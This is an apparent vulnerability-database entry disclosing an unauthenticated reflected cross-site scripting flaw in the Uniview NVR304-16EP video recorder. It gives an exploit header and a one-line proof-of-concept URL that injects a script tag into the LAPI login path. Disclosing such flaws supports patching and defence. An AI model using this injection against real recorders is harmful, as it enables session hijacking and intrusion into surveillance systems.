Lucene search

K

Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (Unauthenticated) Vulnerability

🗓️ 16 Feb 2022 00:00:00Reported by Luis MartínezType 
zdt
 zdt
🔗 0day.today👁 193 Views

Network Video Recorder NVR304-16EP Reflected Cross-Site Scripting Vulnerabilit

Show more
Code
# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Luis Martinez
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
# Tested Version: NVR304-16EP
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A

# Proof of Concept:

http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 Feb 2022 00:00Current
0.4Low risk
Vulners AI Score0.4
193
.json
Report